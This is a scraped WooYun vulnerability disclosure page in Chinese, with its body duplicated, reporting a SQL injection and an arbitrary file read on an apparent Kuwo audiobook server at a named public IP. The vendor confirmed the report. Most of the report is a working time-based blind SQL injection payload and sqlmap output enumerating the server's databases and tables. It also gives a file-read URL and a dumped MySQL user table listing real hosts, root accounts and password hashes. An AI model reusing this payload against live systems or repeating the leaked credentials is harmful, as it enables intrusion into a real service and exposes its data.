酷我某处ROOT权限注入or任意文件读取 | wooyun-2016-0198775| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0198775

漏洞标题：酷我某处ROOT权限注入or任意文件读取

漏洞作者：秋末诉伤

提交时间：2016-04-21 10:25

修复时间：2016-06-05 10:50

公开时间：2016-06-05 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-21：细节已通知厂商并且等待厂商处理中
2016-04-21：厂商已经确认，细节仅向厂商公开
2016-05-01：细节向核心白帽子及相关领域专家公开
2016-05-11：细节向普通白帽子公开
2016-05-21：细节向实习白帽子公开
2016-06-05：细节向公众公开

简要描述：

root

详细说明：

酷我听书注入：http://60.28.216.70/ 如何确认是酷我的呢？看看页面源代码，至于怎么确认是酷我听书的站点，请看后面详情。

http://60.28.216.70/log.php
POST: method=statbyparent&parentid=1&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4

上神器SQLMAP》》》DBA权限

Parameter: parentid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

sqlmap identified the following injection point(s) with a total of 2632 HTTP(s) requests:
---
Parameter: parentid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
information_schema
[*] kuwofm_online
[*] kw_tingshu
[*] kwts_user
[*] logstat
[*] mysql
[*] performance_schema
[*] test
[*] tsbiz
[*] tsbook
[*] tslog
[*] umeng
Database: kuwofm_online
[56 tables]
+-----------------------------------+
| user                              |
| version                           |
| apscheduler_jobs                  |
| audio_file                        |
| category                          |
| channel                           |
| channel_UV                        |
| channel_bak                       |
| channel_category_map              |
| channel_music                     |
| defined_play_column               |
| defined_play_column_map           |
| file_sequence                     |
| fm_channel_playback               |
| fm_channel_program                |
| fm_date_storage_map               |
| fm_failed_order                   |
| fm_product_define                 |
| fm_program_category               |
| fm_program_category_map           |
| fm_program_daily                  |
| fm_program_hot                    |
| fm_program_record                 |
| fm_program_record_play            |
| fm_recommend_banner               |
| fm_recommend_banner_programlist   |
| fm_recommend_program              |
| fm_success_order                  |
| fm_user                           |
| fm_user_product                   |
| hls_host                          |
| location                          |
| message_push                      |
| message_push_configuration        |
| music                             |
| param_conf                        |
| program                           |
| recommend                         |
| record_play_banner                |
| record_play_hot                   |
| record_play_role_map              |
| record_program_category           |
| record_program_feedback           |
| record_program_tag_map            |
| record_program_task               |
| record_tag                        |
| record_tag_category               |
| record_tag_map                    |
| star_channel                      |
| temp_channel                      |
| test                              |
| url_map                           |
| user_channel                      |
| user_listen_record                |
| user_modifytime                   |
| user_record_play_collection       |
+-----------------------------------+
Database: kw_tingshu
[23 tables]
+-----------------------------------+
| paytmp                            |
| tbl_book_basic                    |
| tbl_book_basic_offline            |
| tbl_book_cat_relation             |
| tbl_book_extra                    |
| tbl_book_statistics               |
| tbl_business_user                 |
| tbl_cat                           |
| tbl_chapter                       |
| tbl_chapter_tmp                   |
| tbl_login_log                     |
| tbl_order                         |
| tbl_pay_log                       |
| tbl_umeng_new_user                |
| tbl_uninstall                     |
| tbl_user_activity                 |
| tbl_user_base                     |
| tmp_ad                            |
| tmp_ad2                           |
| usertmp                           |
| vip_pay_3                         |
| vip_pay_jan                       |
| vip_pay_tmp                       |
+-----------------------------------+
Database: kwts_user
[1 table]
+-----------------------------------+
| user_classify                     |
+-----------------------------------+
Database: tsbook
[34 tables]
+-----------------------------------+
| bookr                             |
| tbl_3rd_zhuishu                   |
| tbl_book                          |
| tbl_book_cat                      |
| tbl_book_data                     |
| tbl_book_day_log                  |
| tbl_book_extr                     |
| tbl_book_log                      |
| tbl_book_mass                     |
| tbl_book_tmp                      |
| tbl_cat                           |
| tbl_cat_copy                      |
| tbl_chapter                       |
| tbl_chapter_data                  |
| tbl_chapter_log                   |
| tbl_chapter_tmp                   |
| tbl_copyright                     |
| tbl_editor_newest                 |
| tbl_editor_novel                  |
| tbl_editor_novel_top              |
| tbl_editor_rec_type               |
| tbl_editor_recommend              |
| tbl_editor_startpage              |
| tbl_editor_tag                    |
| tbl_editor_textlink_login_channel |
| tbl_focus_list                    |
| tbl_focus_list_tmp                |
| tbl_focus_type                    |
| tbl_page_layout                   |
| tbl_topic                         |
| tbl_topic_detail                  |
| third_app_key                     |
| tmp_book_cnt                      |
| tmp_data                          |
+-----------------------------------+
Database: tsbiz
[13 tables]
+-----------------------------------+
| tbl_activate                      |
| tbl_ad_flag                       |
| tbl_ad_list                       |
| tbl_invite                        |
| tbl_invite_vip_log                |
| tbl_ios_active_idfa               |
| tbl_ios_mark_idfas                |
| tbl_lucky_ids                     |
| tbl_lucky_prize_list              |
| tbl_mip_order                     |
| tbl_music_rank_rec                |
| tbl_music_ranking                 |
| tbl_vip_pay_log                   |
+-----------------------------------+
[22:55:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 8 times
[22:55:20] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[22:55:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/60.28.216.70'

酷我听书站：

--------------------------------------------------------------------------------
任意文件读取：

http://60.28.216.70/download.php?file=/data1/logdata/temp/stat_parentid_1.txt

----------------------------------------------------------------------
附数据库配置，看IP可以看出是酷我的。

Host,User,plugin,Password,ssl_type,Drop_priv,File_priv,Grant_priv,Alter_priv,ssl_cipher,Index_priv,Event_priv,Super_priv,Create_priv,Update_priv,Reload_priv,Delete_priv,Insert_priv,x509_issuer,Select_priv,max_updates,Execute_priv,Show_db_priv,x509_subject,Process_priv,Trigger_priv,Shutdown_priv,max_questions,Show_view_priv,max_connections,Repl_slave_priv,References_priv,Repl_client_priv,Create_user_priv,password_expired,Lock_tables_priv,Create_view_priv,Alter_routine_priv,Create_routine_priv,max_user_connections,authentication_string,Create_tmp_table_priv,Create_tablespace_priv
127.0.0.1,root,<blank>,<blank>,<blank>,Y,Y,Y,Y,<blank>,Y,Y,Y,Y,Y,Y,Y,Y,<blank>,Y,0,Y,Y,<blank>,Y,Y,Y,0,Y,0,Y,Y,Y,Y,N,Y,Y,Y,Y,0,<blank>,Y,Y
192.168.%,kwts,mysql_native_password,*E7E14591B4390736D0BEA2602FED5C7A908858B0
192.168.0.39,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.53,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.176,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.179,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.226.166,nagios,mysql_native_password,*854A5FFA0256648A594D2D46C12610BE25FDB957
60.28.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.210.91,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.216.69,root,mysql_nativ,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B

请审核打码吧。。

漏洞证明：

酷我听书注入：http://60.28.216.70/ 如何确认是酷我的呢？看看页面源代码，至于怎么确认是酷我听书的站点，请看后面详情。

http://60.28.216.70/log.php
POST: method=statbyparent&parentid=1&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4

上神器SQLMAP》》》DBA权限

Parameter: parentid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

sqlmap identified the following injection point(s) with a total of 2632 HTTP(s) requests:
---
Parameter: parentid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: method=statbyparent&parentid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))jZkD) AND 'NFGP'='NFGP&beginDay=1&endDay=1&bookid=&beginDay=&endDay=&pid=&beginDay=&endDay=&bookid=&beginDay=&endDay=&userid=&beginDay=&endDay=&bookid=&day=&test_submit=%E6%8F%90%E4%BA%A4
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
information_schema
[*] kuwofm_online
[*] kw_tingshu
[*] kwts_user
[*] logstat
[*] mysql
[*] performance_schema
[*] test
[*] tsbiz
[*] tsbook
[*] tslog
[*] umeng
Database: kuwofm_online
[56 tables]
+-----------------------------------+
| user                              |
| version                           |
| apscheduler_jobs                  |
| audio_file                        |
| category                          |
| channel                           |
| channel_UV                        |
| channel_bak                       |
| channel_category_map              |
| channel_music                     |
| defined_play_column               |
| defined_play_column_map           |
| file_sequence                     |
| fm_channel_playback               |
| fm_channel_program                |
| fm_date_storage_map               |
| fm_failed_order                   |
| fm_product_define                 |
| fm_program_category               |
| fm_program_category_map           |
| fm_program_daily                  |
| fm_program_hot                    |
| fm_program_record                 |
| fm_program_record_play            |
| fm_recommend_banner               |
| fm_recommend_banner_programlist   |
| fm_recommend_program              |
| fm_success_order                  |
| fm_user                           |
| fm_user_product                   |
| hls_host                          |
| location                          |
| message_push                      |
| message_push_configuration        |
| music                             |
| param_conf                        |
| program                           |
| recommend                         |
| record_play_banner                |
| record_play_hot                   |
| record_play_role_map              |
| record_program_category           |
| record_program_feedback           |
| record_program_tag_map            |
| record_program_task               |
| record_tag                        |
| record_tag_category               |
| record_tag_map                    |
| star_channel                      |
| temp_channel                      |
| test                              |
| url_map                           |
| user_channel                      |
| user_listen_record                |
| user_modifytime                   |
| user_record_play_collection       |
+-----------------------------------+
Database: kw_tingshu
[23 tables]
+-----------------------------------+
| paytmp                            |
| tbl_book_basic                    |
| tbl_book_basic_offline            |
| tbl_book_cat_relation             |
| tbl_book_extra                    |
| tbl_book_statistics               |
| tbl_business_user                 |
| tbl_cat                           |
| tbl_chapter                       |
| tbl_chapter_tmp                   |
| tbl_login_log                     |
| tbl_order                         |
| tbl_pay_log                       |
| tbl_umeng_new_user                |
| tbl_uninstall                     |
| tbl_user_activity                 |
| tbl_user_base                     |
| tmp_ad                            |
| tmp_ad2                           |
| usertmp                           |
| vip_pay_3                         |
| vip_pay_jan                       |
| vip_pay_tmp                       |
+-----------------------------------+
Database: kwts_user
[1 table]
+-----------------------------------+
| user_classify                     |
+-----------------------------------+
Database: tsbook
[34 tables]
+-----------------------------------+
| bookr                             |
| tbl_3rd_zhuishu                   |
| tbl_book                          |
| tbl_book_cat                      |
| tbl_book_data                     |
| tbl_book_day_log                  |
| tbl_book_extr                     |
| tbl_book_log                      |
| tbl_book_mass                     |
| tbl_book_tmp                      |
| tbl_cat                           |
| tbl_cat_copy                      |
| tbl_chapter                       |
| tbl_chapter_data                  |
| tbl_chapter_log                   |
| tbl_chapter_tmp                   |
| tbl_copyright                     |
| tbl_editor_newest                 |
| tbl_editor_novel                  |
| tbl_editor_novel_top              |
| tbl_editor_rec_type               |
| tbl_editor_recommend              |
| tbl_editor_startpage              |
| tbl_editor_tag                    |
| tbl_editor_textlink_login_channel |
| tbl_focus_list                    |
| tbl_focus_list_tmp                |
| tbl_focus_type                    |
| tbl_page_layout                   |
| tbl_topic                         |
| tbl_topic_detail                  |
| third_app_key                     |
| tmp_book_cnt                      |
| tmp_data                          |
+-----------------------------------+
Database: tsbiz
[13 tables]
+-----------------------------------+
| tbl_activate                      |
| tbl_ad_flag                       |
| tbl_ad_list                       |
| tbl_invite                        |
| tbl_invite_vip_log                |
| tbl_ios_active_idfa               |
| tbl_ios_mark_idfas                |
| tbl_lucky_ids                     |
| tbl_lucky_prize_list              |
| tbl_mip_order                     |
| tbl_music_rank_rec                |
| tbl_music_ranking                 |
| tbl_vip_pay_log                   |
+-----------------------------------+
[22:55:20] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 8 times
[22:55:20] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[22:55:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/60.28.216.70'

酷我听书站：

--------------------------------------------------------------------------------
任意文件读取：

http://60.28.216.70/download.php?file=/data1/logdata/temp/stat_parentid_1.txt

----------------------------------------------------------------------
附数据库配置，看IP可以看出是酷我的。

Host,User,plugin,Password,ssl_type,Drop_priv,File_priv,Grant_priv,Alter_priv,ssl_cipher,Index_priv,Event_priv,Super_priv,Create_priv,Update_priv,Reload_priv,Delete_priv,Insert_priv,x509_issuer,Select_priv,max_updates,Execute_priv,Show_db_priv,x509_subject,Process_priv,Trigger_priv,Shutdown_priv,max_questions,Show_view_priv,max_connections,Repl_slave_priv,References_priv,Repl_client_priv,Create_user_priv,password_expired,Lock_tables_priv,Create_view_priv,Alter_routine_priv,Create_routine_priv,max_user_connections,authentication_string,Create_tmp_table_priv,Create_tablespace_priv
127.0.0.1,root,<blank>,<blank>,<blank>,Y,Y,Y,Y,<blank>,Y,Y,Y,Y,Y,Y,Y,Y,<blank>,Y,0,Y,Y,<blank>,Y,Y,Y,0,Y,0,Y,Y,Y,Y,N,Y,Y,Y,Y,0,<blank>,Y,Y
192.168.%,kwts,mysql_native_password,*E7E14591B4390736D0BEA2602FED5C7A908858B0
192.168.0.39,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.198.53,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.176,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.201.179,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
192.168.226.166,nagios,mysql_native_password,*854A5FFA0256648A594D2D46C12610BE25FDB957
60.28.198.51,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.198.52,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.210.91,root,mysql_native_password,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
60.28.216.69,root,mysql_nativ,*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B

请审核打码吧。。

修复方案：

你们更懂。。

版权声明：转载请注明来源秋末诉伤@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-21 10:43

厂商回复：

感谢对酷我的支持，我们将尽快审核修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0198775

漏洞标题：酷我某处ROOT权限注入or任意文件读取

相关厂商：酷我音乐

漏洞作者：秋末诉伤

提交时间：2016-04-21 10:25

修复时间：2016-06-05 10:50

公开时间：2016-06-05 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源秋末诉伤@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0198775

漏洞标题：酷我某处ROOT权限注入or任意文件读取

相关厂商：酷我音乐

漏洞作者： 秋末诉伤

提交时间：2016-04-21 10:25

修复时间：2016-06-05 10:50

公开时间：2016-06-05 10:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0198775"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 秋末诉伤@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：秋末诉伤

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源秋末诉伤@乌云